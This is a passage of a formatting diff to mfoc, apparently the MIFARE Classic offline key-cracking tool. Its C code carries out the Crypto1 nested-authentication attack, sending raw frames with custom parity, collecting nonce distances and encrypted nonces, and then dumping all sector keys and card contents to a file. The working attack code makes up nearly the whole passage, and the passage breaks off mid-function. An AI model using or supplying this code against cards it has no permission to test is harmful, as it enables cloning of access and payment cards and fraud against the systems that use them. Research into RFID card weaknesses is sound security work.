!t.sectors[i].foundKeyA) || (!dumpKeysA && !t.sectors[i].foundKeyB)) { - fprintf(stdout, "\nTry again, there are still some encrypted blocks\n"); - succeed = 0; - break; - } - } + for (i = 0; i < (t.num_sectors); ++i) { + if ((dumpKeysA && !t.sectors[i].foundKeyA) || (!dumpKeysA && !t.sectors[i].foundKeyB)) { + fprintf(stdout, "\nTry again, there are still some encrypted blocks\n"); + succeed = 0; + break; + } + } - if (succeed) { - i = t.num_sectors; // Sector counter - fprintf(stdout, "Auth with all sectors succeeded, dumping keys to a file!\n"); - // Read all blocks - for (block = t.num_blocks; block >= 0; block--) { - trailer_block(block) ? i-- : i; - failure = true; + if (succeed) { + i = t.num_sectors; // Sector counter + fprintf(stdout, "Auth with all sectors succeeded, dumping keys to a file!\n"); + // Read all blocks + for (block = t.num_blocks; block >= 0; block--) { + trailer_block(block) ? i-- : i; + failure = true; - // Try A key, auth() + read() - memcpy(mp.mpa.abtKey, t.sectors[i].KeyA, sizeof(t.sectors[i].KeyA)); - if (!nfc_initiator_mifare_cmd(r.pdi, MC_AUTH_A, block, &mp)) { - // ERR ("Error: Auth A"); - mf_configure(r.pdi); - mf_anticollision(t, r); - } else { // and Read - if (nfc_initiator_mifare_cmd(r.pdi, MC_READ, block, &mp)) { - fprintf(stdout, "Block %02d, type %c, key %012llx :", block, 'A', bytes_to_num(t.sectors[i].KeyA, 6)); - print_hex(mp.mpd.abtData, 16); - mf_configure(r.pdi); - mf_select_tag(r.pdi, &(t.nt)); - failure = false; - } else { - // Error, now try read() with B key - // ERR ("Error: Read A"); - mf_configure(r.pdi); - mf_anticollision(t, r); - memcpy(mp.mpa.abtKey, t.sectors[i].KeyB, sizeof(t.sectors[i].KeyB)); - if (!nfc_initiator_mifare_cmd(r.pdi, MC_AUTH_B, block, &mp)) { - // ERR ("Error: Auth B"); - mf_configure(r.pdi); - mf_anticollision(t, r); - } else { // and Read - if (nfc_initiator_mifare_cmd(r.pdi, MC_READ, block, &mp)) { - fprintf(stdout, "Block %02d, type %c, key %012llx :", block, 'B', bytes_to_num(t.sectors[i].KeyB, 6)); - print_hex(mp.mpd.abtData, 16); - mf_configure(r.pdi); - mf_select_tag(r.pdi, &(t.nt)); - failure = false; - } else { - mf_configure(r.pdi); - mf_anticollision(t, r); - // ERR ("Error: Read B"); - } - } - } - } - if (trailer_block(block)) { - // Copy the keys over from our key dump and store the retrieved access bits - memcpy(mtDump.amb[block].mbt.abtKeyA, t.sectors[i].KeyA,6); - memcpy(mtDump.amb[block].mbt.abtKeyB,t.sectors[i].KeyB,6); - if (!failure) memcpy(mtDump.amb[block].mbt.abtAccessBits,mp.mpd.abtData+6,4); - } else if (!failure) memcpy(mtDump.amb[block].mbd.abtData, mp.mpd.abtData,16); - memcpy(mp.mpa.abtAuthUid, t.nt.nti.nai.abtUid + t.nt.nti.nai.szUidLen - 4, sizeof(mp.mpa.abtAuthUid)); - } + // Try A key, auth() + read() + memcpy(mp.mpa.abtKey, t.sectors[i].KeyA, sizeof(t.sectors[i].KeyA)); + if (!nfc_initiator_mifare_cmd(r.pdi, MC_AUTH_A, block, &mp)) { + // ERR ("Error: Auth A"); + mf_configure(r.pdi); + mf_anticollision(t, r); + } else { // and Read + if (nfc_initiator_mifare_cmd(r.pdi, MC_READ, block, &mp)) { + fprintf(stdout, "Block %02d, type %c, key %012llx :", block, 'A', bytes_to_num(t.sectors[i].KeyA, 6)); + print_hex(mp.mpd.abtData, 16); + mf_configure(r.pdi); + mf_select_tag(r.pdi, &(t.nt)); + failure = false; + } else { + // Error, now try read() with B key + // ERR ("Error: Read A"); + mf_configure(r.pdi); + mf_anticollision(t, r); + memcpy(mp.mpa.abtKey, t.sectors[i].KeyB, sizeof(t.sectors[i].KeyB)); + if (!nfc_initiator_mifare_cmd(r.pdi, MC_AUTH_B, block, &mp)) { + // ERR ("Error: Auth B"); + mf_configure(r.pdi); + mf_anticollision(t, r); + } else { // and Read + if (nfc_initiator_mifare_cmd(r.pdi, MC_READ, block, &mp)) { + fprintf(stdout, "Block %02d, type %c, key %012llx :", block, 'B', bytes_to_num(t.sectors[i].KeyB, 6)); + print_hex(mp.mpd.abtData, 16); + mf_configure(r.pdi); + mf_select_tag(r.pdi, &(t.nt)); + failure = false; + } else { + mf_configure(r.pdi); + mf_anticollision(t, r); + // ERR ("Error: Read B"); + } + } + } + } + if (trailer_block(block)) { + // Copy the keys over from our key dump and store the retrieved access bits + memcpy(mtDump.amb[block].mbt.abtKeyA, t.sectors[i].KeyA, 6); + memcpy(mtDump.amb[block].mbt.abtKeyB, t.sectors[i].KeyB, 6); + if (!failure) memcpy(mtDump.amb[block].mbt.abtAccessBits, mp.mpd.abtData + 6, 4); + } else if (!failure) memcpy(mtDump.amb[block].mbd.abtData, mp.mpd.abtData, 16); + memcpy(mp.mpa.abtAuthUid, t.nt.nti.nai.abtUid + t.nt.nti.nai.szUidLen - 4, sizeof(mp.mpa.abtAuthUid)); + } - // Finally save all keys + data to file - if (fwrite(&mtDump, 1, sizeof(mtDump), pfDump) != sizeof(mtDump)) { - fprintf(stdout, "Error, cannot write dump\n"); - fclose(pfDump); - goto error; - } - fclose(pfDump); - } + // Finally save all keys + data to file + if (fwrite(&mtDump, 1, sizeof(mtDump), pfDump) != sizeof(mtDump)) { + fprintf(stdout, "Error, cannot write dump\n"); + fclose(pfDump); + goto error; + } + fclose(pfDump); + } - free(t.sectors); - free(d.distances); + free(t.sectors); + free(d.distances); - // Reset the "advanced" configuration to normal - nfc_device_set_property_bool(r.pdi, NP_HANDLE_CRC, true); - nfc_device_set_property_bool(r.pdi, NP_HANDLE_PARITY, true); + // Reset the "advanced" configuration to normal + nfc_device_set_property_bool(r.pdi, NP_HANDLE_CRC, true); + nfc_device_set_property_bool(r.pdi, NP_HANDLE_PARITY, true); - // Disconnect device and exit - nfc_close(r.pdi); - nfc_exit(context); - exit (EXIT_SUCCESS); + // Disconnect device and exit + nfc_close(r.pdi); + nfc_exit(context); + exit(EXIT_SUCCESS); error: - nfc_close(r.pdi); - nfc_exit(context); - exit (EXIT_FAILURE); + nfc_close(r.pdi); + nfc_exit(context); + exit(EXIT_FAILURE); } -void usage(FILE * stream, int errno) { - fprintf(stream, "Usage: mfoc [-h] [-k key]... [-P probnum] [-T tolerance] [-O output]\n"); - fprintf(stream, "\n"); - fprintf(stream, " h print this help and exit\n"); +void usage(FILE *stream, int errno) +{ + fprintf(stream, "Usage: mfoc [-h] [-k key]... [-P probnum] [-T tolerance] [-O output]\n"); + fprintf(stream, "\n"); + fprintf(stream, " h print this help and exit\n"); // fprintf(stream, " B instead of 'A' dump 'B' keys\n"); - fprintf(stream, " k try the specified key in addition to the default keys\n"); + fprintf(stream, " k try the specified key in addition to the default keys\n"); // fprintf(stream, " D number of distance probes, default is 20\n"); // fprintf(stream, " S number of sets with keystreams, default is 5\n"); - fprintf(stream, " P number of probes per sector, instead of default of 20\n"); - fprintf(stream, " T nonce tolerance half-range, instead of default of 20\n (i.e., 40 for the total range, in both directions)\n"); + fprintf(stream, " P number of probes per sector, instead of default of 20\n"); + fprintf(stream, " T nonce tolerance half-range, instead of default of 20\n (i.e., 40 for the total range, in both directions)\n"); // fprintf(stream, " s specify the list of sectors to crack, for example -s 0,1,3,5\n"); - fprintf(stream, " O file in which the card contents will be written (REQUIRED)\n"); - fprintf(stream, "\n"); - fprintf(stream, "Example: mfoc -O mycard.mfd\n"); - fprintf(stream, "Example: mfoc -k ffffeeeedddd -O mycard.mfd\n"); - fprintf(stream, "Example: mfoc -P 50 -T 30 -O mycard.mfd\n"); - fprintf(stream, "\n"); - fprintf(stream, "This is mfoc version %s.\n", PACKAGE_VERSION); - fprintf(stream, "For more information, run: 'man mfoc'.\n"); - exit(errno); + fprintf(stream, " O file in which the card contents will be written (REQUIRED)\n"); + fprintf(stream, "\n"); + fprintf(stream, "Example: mfoc -O mycard.mfd\n"); + fprintf(stream, "Example: mfoc -k ffffeeeedddd -O mycard.mfd\n"); + fprintf(stream, "Example: mfoc -P 50 -T 30 -O mycard.mfd\n"); + fprintf(stream, "\n"); + fprintf(stream, "This is mfoc version %s.\n", PACKAGE_VERSION); + fprintf(stream, "For more information, run: 'man mfoc'.\n"); + exit(errno); } -void mf_init(mfreader *r) { - // Connect to the first NFC device - nfc_init(&context); - r->pdi = nfc_open(context, NULL); - if (!r->pdi) { - printf ("No NFC device found.\n"); - exit (EXIT_FAILURE); - } +void mf_init(mfreader *r) +{ + // Connect to the first NFC device + nfc_init(&context); + r->pdi = nfc_open(context, NULL); + if (!r->pdi) { + printf("No NFC device found.\n"); + exit(EXIT_FAILURE); + } } -void mf_configure(nfc_device* pdi) { - if (nfc_initiator_init (pdi) < 0) { - nfc_perror (pdi, "nfc_initiator_init"); - exit (EXIT_FAILURE); - } - // Drop the field for a while, so can be reset - if (nfc_device_set_property_bool(pdi, NP_ACTIVATE_FIELD, false) < 0) { - nfc_perror (pdi, "nfc_device_set_property_bool activate field"); - exit (EXIT_FAILURE); - } - // Let the reader only try once to find a tag - if (nfc_device_set_property_bool(pdi, NP_INFINITE_SELECT, false) < 0) { - nfc_perror (pdi, "nfc_device_set_property_bool infinite select"); - exit (EXIT_FAILURE); - } - // Configure the CRC and Parity settings - if (nfc_device_set_property_bool(pdi, NP_HANDLE_CRC, true) < 0) { - nfc_perror (pdi, "nfc_device_set_property_bool crc"); - exit (EXIT_FAILURE); - } - if (nfc_device_set_property_bool(pdi, NP_HANDLE_PARITY, true) < 0) { - nfc_perror (pdi, "nfc_device_set_property_bool parity"); - exit (EXIT_FAILURE); - } - // Enable the field so more power consuming cards can power themselves up - if (nfc_device_set_property_bool(pdi, NP_ACTIVATE_FIELD, true) < 0) { - nfc_perror (pdi, "nfc_device_set_property_bool activate field"); - exit (EXIT_FAILURE); - } +void mf_configure(nfc_device *pdi) +{ + if (nfc_initiator_init(pdi) < 0) { + nfc_perror(pdi, "nfc_initiator_init"); + exit(EXIT_FAILURE); + } + // Drop the field for a while, so can be reset + if (nfc_device_set_property_bool(pdi, NP_ACTIVATE_FIELD, false) < 0) { + nfc_perror(pdi, "nfc_device_set_property_bool activate field"); + exit(EXIT_FAILURE); + } + // Let the reader only try once to find a tag + if (nfc_device_set_property_bool(pdi, NP_INFINITE_SELECT, false) < 0) { + nfc_perror(pdi, "nfc_device_set_property_bool infinite select"); + exit(EXIT_FAILURE); + } + // Configure the CRC and Parity settings + if (nfc_device_set_property_bool(pdi, NP_HANDLE_CRC, true) < 0) { + nfc_perror(pdi, "nfc_device_set_property_bool crc"); + exit(EXIT_FAILURE); + } + if (nfc_device_set_property_bool(pdi, NP_HANDLE_PARITY, true) < 0) { + nfc_perror(pdi, "nfc_device_set_property_bool parity"); + exit(EXIT_FAILURE); + } + // Enable the field so more power consuming cards can power themselves up + if (nfc_device_set_property_bool(pdi, NP_ACTIVATE_FIELD, true) < 0) { + nfc_perror(pdi, "nfc_device_set_property_bool activate field"); + exit(EXIT_FAILURE); + } } -void mf_select_tag(nfc_device* pdi, nfc_target* pnt) { - // Poll for a ISO14443A (MIFARE) tag - const nfc_modulation nm = { - .nmt = NMT_ISO14443A, - .nbr = NBR_106, - }; - if (nfc_initiator_select_passive_target(pdi, nm, NULL, 0, pnt) < 0) { - ERR ("Unable to connect to the MIFARE Classic tag"); - nfc_close(pdi); - nfc_exit(context); - exit (EXIT_FAILURE); - } +void mf_select_tag(nfc_device *pdi, nfc_target *pnt) +{ + // Poll for a ISO14443A (MIFARE) tag + const nfc_modulation nm = { + .nmt = NMT_ISO14443A, + .nbr = NBR_106, + }; + if (nfc_initiator_select_passive_target(pdi, nm, NULL, 0, pnt) < 0) { + ERR("Unable to connect to the MIFARE Classic tag"); + nfc_close(pdi); + nfc_exit(context); + exit(EXIT_FAILURE); + } } int trailer_block(uint32_t block) { - // Test if we are in the small or big sectors - return (block < 128) ? ((block + 1) % 4 == 0) : ((block + 1) % 16 == 0); + // Test if we are in the small or big sectors + return (block < 128) ? ((block + 1) % 4 == 0) : ((block + 1) % 16 == 0); } // Return position of sector if it is encrypted with the default key otherwise exit.. -int find_exploit_sector(mftag t) { - int i; - bool interesting = false; +int find_exploit_sector(mftag t) +{ + int i; + bool interesting = false; - for (i = 0; i < t.num_sectors; i++) { - if (!t.sectors[i].foundKeyA || !t.sectors[i].foundKeyB) { - interesting = true; - break; - } - } - if (!interesting) { - fprintf(stdout, "\nWe have all sectors encrypted with the default keys..\n\n"); - return -1; - } - for (i = 0; i < t.num_sectors; i++) { - if ((t.sectors[i].foundKeyA) || (t.sectors[i].foundKeyB)) { - fprintf(stdout, "\n\nUsing sector %02d as an exploit sector\n", i); - return i; - } - } - ERR ("\n\nNo sector encrypted with the default key has been found, exiting.."); - exit (EXIT_FAILURE); + for (i = 0; i < t.num_sectors; i++) { + if (!t.sectors[i].foundKeyA || !t.sectors[i].foundKeyB) { + interesting = true; + break; + } + } + if (!interesting) { + fprintf(stdout, "\nWe have all sectors encrypted with the default keys..\n\n"); + return -1; + } + for (i = 0; i < t.num_sectors; i++) { + if ((t.sectors[i].foundKeyA) || (t.sectors[i].foundKeyB)) { + fprintf(stdout, "\n\nUsing sector %02d as an exploit sector\n", i); + return i; + } + } + ERR("\n\nNo sector encrypted with the default key has been found, exiting.."); + exit(EXIT_FAILURE); } -void mf_anticollision(mftag t, mfreader r) { - const nfc_modulation nm = { - .nmt = NMT_ISO14443A, - .nbr = NBR_106, - }; - if (nfc_initiator_select_passive_target(r.pdi, nm, NULL, 0, &t.nt) < 0) { - nfc_perror (r.pdi, "nfc_initiator_select_passive_target"); - ERR ("Tag has been removed"); - exit (EXIT_FAILURE); - } +void mf_anticollision(mftag t, mfreader r) +{ + const nfc_modulation nm = { + .nmt = NMT_ISO14443A, + .nbr = NBR_106, + }; + if (nfc_initiator_select_passive_target(r.pdi, nm, NULL, 0, &t.nt) < 0) { + nfc_perror(r.pdi, "nfc_initiator_select_passive_target"); + ERR("Tag has been removed"); + exit(EXIT_FAILURE); + } } -int mf_enhanced_auth(int e_sector, int a_sector, mftag t, mfreader r, denonce *d, pKeys *pk, char mode, bool dumpKeysA) { - struct Crypto1State* pcs; - struct Crypto1State* revstate; - struct Crypto1State* revstate_start; +int mf_enhanced_auth(int e_sector, int a_sector, mftag t, mfreader r, denonce *d, pKeys *pk, char mode, bool dumpKeysA) +{ + struct Crypto1State *pcs; + struct Crypto1State *revstate; + struct Crypto1State *revstate_start; - uint64_t lfsr; + uint64_t lfsr; - // Possible key counter, just continue with a previous "session" - uint32_t kcount = pk->size; + // Possible key counter, just continue with a previous "session" + uint32_t kcount = pk->size; - uint8_t Nr[4] = { 0x00,0x00,0x00,0x00 }; // Reader nonce - uint8_t Auth[4] = { 0x00, t.sectors[e_sector].trailer, 0x00, 0x00 }; - uint8_t AuthEnc[4] = { 0x00, t.sectors[e_sector].trailer, 0x00, 0x00 }; - uint8_t AuthEncPar[8] = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; + uint8_t Nr[4] = { 0x00, 0x00, 0x00, 0x00 }; // Reader nonce + uint8_t Auth[4] = { 0x00, t.sectors[e_sector].trailer, 0x00, 0x00 }; + uint8_t AuthEnc[4] = { 0x00, t.sectors[e_sector].trailer, 0x00, 0x00 }; + uint8_t AuthEncPar[8] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; - uint8_t ArEnc[8] = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; - uint8_t ArEncPar[8] = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; + uint8_t ArEnc[8] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; + uint8_t ArEncPar[8] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; - uint8_t Rx[MAX_FRAME_LEN]; // Tag response - uint8_t RxPar[MAX_FRAME_LEN]; // Tag response + uint8_t Rx[MAX_FRAME_LEN]; // Tag response + uint8_t RxPar[MAX_FRAME_LEN]; // Tag response - uint32_t Nt, NtLast, NtProbe, NtEnc, Ks1; + uint32_t Nt, NtLast, NtProbe, NtEnc, Ks1; - int i, m; + int i, m; - // Prepare AUTH command - Auth[0] = (t.sectors[e_sector].foundKeyA) ? 0x60 : 0x61; - iso14443a_crc_append (Auth,2); - // fprintf(stdout, "\nAuth command:\t"); - // print_hex(Auth, 4); + // Prepare AUTH command + Auth[0] = (t.sectors[e_sector].foundKeyA) ? 0x60 : 0x61; + iso14443a_crc_append(Auth, 2); + // fprintf(stdout, "\nAuth command:\t"); + // print_hex(Auth, 4); - // We need full control over the CRC - if (nfc_device_set_property_bool(r.pdi, NP_HANDLE_CRC, false) < 0) { - nfc_perror (r.pdi, "nfc_device_set_property_bool crc"); - exit (EXIT_FAILURE); - } + // We need full control over the CRC + if (nfc_device_set_property_bool(r.pdi, NP_HANDLE_CRC, false) < 0) { + nfc_perror(r.pdi, "nfc_device_set_property_bool crc"); + exit(EXIT_FAILURE); + } - // Request plain tag-nonce - // TODO: Set NP_EASY_FRAMING option only once if possible - if (nfc_device_set_property_bool (r.pdi, NP_EASY_FRAMING, false) < 0) { - nfc_perror (r.pdi, "nfc_device_set_property_bool framing"); - exit (EXIT_FAILURE); - } + // Request plain tag-nonce + // TODO: Set NP_EASY_FRAMING option only once if possible + if (nfc_device_set_property_bool(r.pdi, NP_EASY_FRAMING, false) < 0) { + nfc_perror(r.pdi, "nfc_device_set_property_bool framing"); + exit(EXIT_FAILURE); + } - if (nfc_initiator_transceive_bytes(r.pdi, Auth, 4, Rx, sizeof(Rx), 0) < 0) { - fprintf(stdout, "Error while requesting plain tag-nonce\n"); - exit(EXIT_FAILURE); - } + if (nfc_initiator_transceive_bytes(r.pdi, Auth, 4, Rx, sizeof(Rx), 0) < 0) { + fprintf(stdout, "Error while requesting plain tag-nonce\n"); + exit(EXIT_FAILURE); + } - if (nfc_device_set_property_bool (r.pdi, NP_EASY_FRAMING, true) < 0) { - nfc_perror (r.pdi, "nfc_device_set_property_bool"); - exit (EXIT_FAILURE); - } - // print_hex(Rx, 4); + if (nfc_device_set_property_bool(r.pdi, NP_EASY_FRAMING, true) < 0) { + nfc_perror(r.pdi, "nfc_device_set_property_bool"); + exit(EXIT_FAILURE); + } + // print_hex(Rx, 4); - // Save the tag nonce (Nt) - Nt = bytes_to_num(Rx, 4); + // Save the tag nonce (Nt) + Nt = bytes_to_num(Rx, 4); - // Init the cipher with key {0..47} bits - if (t.sectors[e_sector].foundKeyA) { - pcs = crypto1_create(bytes_to_num(t.sectors[e_sector].KeyA, 6)); - } else { - pcs = crypto1_create(bytes_to_num(t.sectors[e_sector].KeyB, 6)); - } + // Init the cipher with key {0..47} bits + if (t.sectors[e_sector].foundKeyA) { + pcs = crypto1_create(bytes_to_num(t.sectors[e_sector].KeyA, 6)); + } else { + pcs = crypto1_create(bytes_to_num(t.sectors[e_sector].KeyB, 6)); + } - // Load (plain) uid^nt into the cipher {48..79} bits - crypto1_word(pcs, bytes_to_num(Rx, 4) ^ t.authuid, 0); + // Load (plain) uid^nt into the cipher {48..79} bits + crypto1_word(pcs, bytes_to_num(Rx, 4) ^ t.authuid, 0); - // Generate (encrypted) nr+parity by loading it into the cipher - for (i = 0; i < 4; i++) { - // Load in, and encrypt the reader nonce (Nr) - ArEnc[i] = crypto1_byte(pcs, Nr[i], 0) ^ Nr[i]; - ArEncPar[i] = filter(pcs->odd) ^ oddparity(Nr[i]); - } - // Skip 32 bits in the pseudo random generator - Nt = prng_successor(Nt, 32); - // Generate reader-answer from tag-nonce - for (i = 4; i < 8; i++) { - // Get the next random byte - Nt = prng_successor(Nt, 8); - // Encrypt the reader-answer (Nt' = suc2(Nt)) - ArEnc[i] = crypto1_byte(pcs, 0x00, 0) ^ (Nt&0xff); - ArEncPar[i] = filter(pcs->odd) ^ oddparity(Nt); - } + // Generate (encrypted) nr+parity by loading it into the cipher + for (i = 0; i < 4; i++) { + // Load in, and encrypt the reader nonce (Nr) + ArEnc[i] = crypto1_byte(pcs, Nr[i], 0) ^ Nr[i]; + ArEncPar[i] = filter(pcs->odd) ^ oddparity(Nr[i]); + } + // Skip 32 bits in the pseudo random generator + Nt = prng_successor(Nt, 32); + // Generate reader-answer from tag-nonce + for (i = 4; i < 8; i++) { + // Get the next random byte + Nt = prng_successor(Nt, 8); + // Encrypt the reader-answer (Nt' = suc2(Nt)) + ArEnc[i] = crypto1_byte(pcs, 0x00, 0) ^(Nt & 0xff); + ArEncPar[i] = filter(pcs->odd) ^ oddparity(Nt); + } - // Finally we want to send arbitrary parity bits - if (nfc_device_set_property_bool(r.pdi, NP_HANDLE_PARITY, false) < 0) { - nfc_perror (r.pdi, "nfc_device_set_property_bool parity"); - exit (EXIT_FAILURE); - } + // Finally we want to send arbitrary parity bits + if (nfc_device_set_property_bool(r.pdi, NP_HANDLE_PARITY, false) < 0) { + nfc_perror(r.pdi, "nfc_device_set_property_bool parity"); + exit(EXIT_FAILURE); + } - // Transmit reader-answer - // fprintf(stdout, "\t{Ar}:\t"); - // print_hex_par(ArEnc, 64, ArEncPar); - int res; - if (((res = nfc_initiator_transceive_bits(r.pdi, ArEnc, 64, ArEncPar, Rx, sizeof(Rx), RxPar)) < 0) || (res != 32)) { - ERR ("Reader-answer transfer error, exiting.."); - exit (EXIT_FAILURE); - } + // Transmit reader-answer + // fprintf(stdout, "\t{Ar}:\t"); + // print_hex_par(ArEnc, 64, ArEncPar); + int res; + if (((res = nfc_initiator_transceive_bits(r.pdi, ArEnc, 64, ArEncPar, Rx, sizeof(Rx), RxPar)) < 0) || (res != 32)) { + ERR("Reader-answer transfer error, exiting.."); + exit(EXIT_FAILURE); + } - // Now print the answer from the tag - // fprintf(stdout, "\t{At}:\t"); - // print_hex_par(Rx,RxLen,RxPar); + // Now print the answer from the tag + // fprintf(stdout, "\t{At}:\t"); + // print_hex_par(Rx,RxLen,RxPar); - // Decrypt the tag answer and verify that suc3(Nt) is At - Nt = prng_successor(Nt, 32); - if (!((crypto1_word(pcs, 0x00, 0) ^ bytes_to_num(Rx, 4)) == (Nt&0xFFFFFFFF))) { - ERR ("[At] is not Suc3(Nt), something is wrong, exiting.."); - exit (EXIT_FAILURE); - } - // fprintf(stdout, "Authentication completed.\n\n"); + // Decrypt the tag answer and verify that suc3(Nt) is At + Nt = prng_successor(Nt, 32); + if (!((crypto1_word(pcs, 0x00, 0) ^ bytes_to_num(Rx, 4)) == (Nt & 0xFFFFFFFF))) { + ERR("[At] is not Suc3(Nt), something is wrong, exiting.."); + exit(EXIT_FAILURE); + } + // fprintf(stdout, "Authentication completed.\n\n"); - // If we are in "Get Distances" mode - if (mode == 'd') { - for (m = 0; m < d->num_distances; m++) { - // fprintf(stdout, "Nested Auth number: %x: ,", m); - // Encrypt Auth command with the current keystream - for (i = 0; i < 4; i++) { - AuthEnc[i] = crypto1_byte(pcs,0x00,0) ^ Auth[i]; - // Encrypt the parity bits with the 4 plaintext bytes - AuthEncPar[i] = filter(pcs->odd) ^ oddparity(Auth[i]); - } + // If we are in "Get Distances" mode + if (mode == 'd') { + for (m = 0; m < d->num_distances; m++) { + // fprintf(stdout, "Nested Auth number: %x: ,", m); + // Encrypt Auth command with the current keystream + for (i = 0; i < 4; i++) { + AuthEnc[i] = crypto1_byte(pcs, 0x00, 0) ^ Auth[i]; + // Encrypt the parity bits with the 4 plaintext bytes + AuthEncPar[i] = filter(pcs->odd) ^ oddparity(Auth[i]); + } - // Sending the encrypted Auth command - if (nfc_initiator_transceive_bits(r.pdi, AuthEnc, 32, AuthEncPar, Rx, sizeof(Rx), RxPar) < 0) { - fprintf(stdout, "Error requesting encrypted tag-nonce\n"); - exit (EXIT_FAILURE); - } + // Sending the encrypted Auth command + if (nfc_initiator_transceive_bits(r.pdi, AuthEnc, 32, AuthEncPar, Rx, sizeof(Rx), RxPar) < 0) { + fprintf(stdout, "Error requesting encrypted tag-nonce\n"); + exit(EXIT_FAILURE); + } - // Decrypt the encrypted auth - if (t.sectors[e_sector].foundKeyA) { - pcs = crypto1_create(bytes_to_num(t.sectors[e_sector].KeyA, 6)); - } else { - pcs = crypto1_create(bytes_to_num(t.sectors[e_sector].KeyB, 6)); - } - NtLast = bytes_to_num(Rx, 4) ^ crypto1_word(pcs, bytes_to_num(Rx, 4) ^ t.authuid, 1); + // Decrypt the encrypted auth + if (t.sectors[e_sector].foundKeyA) { + pcs = crypto1_create(bytes_to_num(t.sectors[e_sector].KeyA, 6)); + } else { + pcs = crypto1_create(bytes_to_num(t.sectors[e_sector].KeyB, 6)); + } + NtLast = bytes_to_num(Rx, 4) ^ crypto1_word(pcs, bytes_to_num(Rx, 4) ^ t.authuid, 1); - // Save the determined nonces distance - d->distances[m] = nonce_distance(Nt, NtLast); - // fprintf(stdout, "distance: %05d\n", d->distances[m]); + // Save the determined nonces distance + d->distances[m] = nonce_distance(Nt, NtLast); + // fprintf(stdout, "distance: %05d\n", d->distances[m]); - // Again, prepare and send {At} - for (i = 0; i < 4; i++) { - ArEnc[i] = crypto1_byte(pcs, Nr[i], 0) ^ Nr[i]; - ArEncPar[i] = filter(pcs->odd) ^ oddparity(Nr[i]); - } - Nt = prng_successor(NtLast, 32); - for (i = 4; i < 8; i++) { - Nt = prng_successor(Nt, 8); - ArEnc[i] = crypto1_byte(pcs, 0x00, 0) ^ (Nt&0xFF); - ArEncPar[i] = filter(pcs->odd) ^ oddparity(Nt); - } - nfc_device_set_property_bool(r.pdi,NP_HANDLE_PARITY,false); - if (((res = nfc_initiator_transceive_bits(r.pdi, ArEnc, 64, ArEncPar, Rx, sizeof(Rx), RxPar)) < 0) || (res != 32)) { - ERR ("Reader-answer transfer error, exiting.."); - exit (EXIT_FAILURE); - } - Nt = prng_successor(Nt, 32); - if (!((crypto1_word(pcs, 0x00, 0) ^ bytes_to_num(Rx, 4)) == (Nt&0xFFFFFFFF))) { - ERR ("[At] is not Suc3(Nt), something is wrong, exiting.."); - exit (EXIT_FAILURE); - } - } // Next auth probe + // Again, prepare and send {At} + for (i = 0; i < 4; i++) { + ArEnc[i] = crypto1_byte(pcs, Nr[i], 0) ^ Nr[i]; + ArEncPar[i] = filter(pcs->odd) ^ oddparity(Nr[i]); + } + Nt = prng_successor(NtLast, 32); + for (i = 4; i < 8; i++) { + Nt = prng_successor(Nt, 8); + ArEnc[i] = crypto1_byte(pcs, 0x00, 0) ^(Nt & 0xFF); + ArEncPar[i] = filter(pcs->odd) ^ oddparity(Nt); + } + nfc_device_set_property_bool(r.pdi, NP_HANDLE_PARITY, false); + if (((res = nfc_initiator_transceive_bits(r.pdi, ArEnc, 64, ArEncPar, Rx, sizeof(Rx), RxPar)) < 0) || (res != 32)) { + ERR("Reader-answer transfer error, exiting.."); + exit(EXIT_FAILURE); + } + Nt = prng_successor(Nt, 32); + if (!((crypto1_word(pcs, 0x00, 0) ^ bytes_to_num(Rx, 4)) == (Nt & 0xFFFFFFFF))) { + ERR("[At] is not Suc3(Nt), something is wrong, exiting.."); + exit(EXIT_FAILURE); + } + } // Next auth probe - // Find median from all distances - d->median = median(*d); - //fprintf(stdout, "Median: %05d\n", d->median); - } // The end of Get Distances mode + // Find median from all distances + d->median = median(*d); + //fprintf(stdout, "Median: %05d\n", d->median); + } // The end of Get Distances mode - // If we are in "Get Recovery" mode - if (mode == 'r') { - // Again, prepare the Auth command with MC_AUTH_A, recover the block and CRC - Auth[0] = dumpKeysA ? 0x60 : 0x61; - Auth[1] = a_sector; - iso14443a_crc_append (Auth,2); + // If we are in "Get Recovery" mode + if (mode == 'r') { + // Again, prepare the Auth command with MC_AUTH_A, recover the block and CRC + Auth[0] = dumpKeysA ? 0x60 : 0x61; + Auth[1] = a_sector; + iso14443a_crc_append(Auth, 2); - // Encryption of the Auth command, sending the Auth command - for (i = 0; i < 4; i++) { - AuthEnc[i] = crypto1_byte(pcs,0x00,0) ^ Auth[i]; - // Encrypt the parity bits with the 4 plaintext bytes - AuthEncPar[i] = filter(pcs->odd) ^ oddparity(Auth[i]); - } - if (nfc_initiator_transceive_bits(r.pdi, AuthEnc, 32, AuthEncPar, Rx, sizeof(Rx), RxPar) < 0) { - ERR ("while requesting encrypted tag-nonce"); - exit (EXIT_FAILURE); - } + // Encryption of the Auth command, sending the Auth command + for (i = 0; i < 4; i++) { + AuthEnc[i] = crypto1_byte(pcs, 0x00, 0) ^ Auth[i]; + // Encrypt the parity bits with the 4 plaintext bytes + AuthEncPar[i] = filter(pcs->odd) ^ oddparity(Auth[i]); + } + if (nfc_initiator_transceive_bits(r.pdi, AuthEnc, 32, AuthEncPar, Rx, sizeof(Rx), RxPar) < 0) { + ERR("while requesting encrypted tag-nonce"); + exit(EXIT_FAILURE); + } - // Finally we want to send arbitrary parity bits - if (nfc_device_set_property_bool(r.pdi, NP_HANDLE_PARITY, true) < 0) { - nfc_perror (r.pdi, "nfc_device_set_property_bool parity restore M"); - exit (EXIT_FAILURE); - } + // Finally we want to send arbitrary parity bits + if (nfc_device_set_property_bool(r.pdi, NP_HANDLE_PARITY, true) < 0) { + nfc_perror(r.pdi, "nfc_device_set_property_bool parity restore M"); + exit(EXIT_FAILURE); + } - if (nfc_device_set_property_bool(r.pdi, NP_HANDLE_CRC, true) < 0) { - nfc_perror (r.pdi, "nfc_device_set_property_bool crc restore M"); - exit (EXIT_FAILURE); - } + if (nfc_device_set_property_bool(r.pdi, NP_HANDLE_CRC, true) < 0) { + nfc_perror(r.pdi, "nfc_device_set_property_bool crc restore M"); + exit(EXIT_FAILURE); + } - // Save the encrypted nonce - NtEnc = bytes_to_num(Rx, 4); + // Save the encrypted nonce + NtEnc = bytes_to_num(Rx, 4); - // 